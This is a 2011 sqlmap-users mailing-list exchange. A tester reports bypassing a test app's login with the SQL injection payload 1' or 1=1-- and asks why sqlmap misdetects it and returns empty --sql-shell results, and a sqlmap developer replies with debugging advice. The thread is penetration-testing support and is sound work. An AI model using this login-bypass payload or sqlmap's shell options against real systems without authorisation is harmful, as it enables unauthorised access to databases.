hi Matt On Sat, Jun 4, 2011 at 10:47 PM, Matt Gardenghi <mtgar...@gmail.com> wrote: > Hello, > > I've been testing a non-production app from a black-box perspective. The > only SQLi I've found is from the login page. I can bypass the login by > dropping something like: 1' or 1=1-- into the password field. > Unfortunately, sqlmap doesn't find this vulnerability. Well, that's not > quite true. I eventually, dumped my Burp proxy log into a file and had > sqlmap target it. The POST file is icky (IIS7.5 ASP and tons of weird data > running around). Still after repeated tests, sqlmap eventually found this > vulnerability as a time based SQLi. > > I don't understand why sqlmap cannot locate the vulnerability via the > stacked query or simply that it bypasses the login page. When I get in, I > can't extract data. I can get verification that I'm a DBA, but little to > nothing else. With --sql-shell, I can run 'SELECT @@version' and sqlmap > returns a blank data set; if the query is bogus, it returns an error. So, > for some reason, no data is returned. > Would anyone be able to give me some pointers on a) why sqlmap doesn't see > this injection properly, and b) why I would get no data returned?
no problem. in this kind of situations rule of thumb goes like this: 1) try to exploit it manually 2) if you succeed in 1) then please report back and we'll be more than happy to make a fix 3) if you don't succeed with 1) then please collect as much data as you can with -v 3 and -t traffic.txt, inspect it yourself and try to find something that could explain the faulty sqlmap's behavior 4) if you are not very skillful with 2) or 3) you can always send some more data (traffic.txt, debug output of -v 3, target url) privately via email kr p.s. personally, i admire people that do 1) and 2) by themself and report back. > Thanks, > > -- > Matt Gardenghi > > ------------------------------------------------------------------------------ > Simplify data backup and recovery for your virtual environment with vRanger. > Installation's a snap, and flexible recovery options mean your data is safe, > secure and there when you need it. Discover what all the cheering's about. > Get your free trial download today. > http://p.sf.net/sfu/quest-dev2dev2 > _______________________________________________ > sqlmap-users mailing list > sqlmap-users@lists.sourceforge.net > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B ------------------------------------------------------------------------------ Simplify data backup and recovery for your virtual environment with vRanger. Installation's a snap, and flexible recovery options mean your data is safe, secure and there when you need it. Discover what all the cheering's about. Get your free trial download today. http://p.sf.net/sfu/quest-dev2dev2 _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
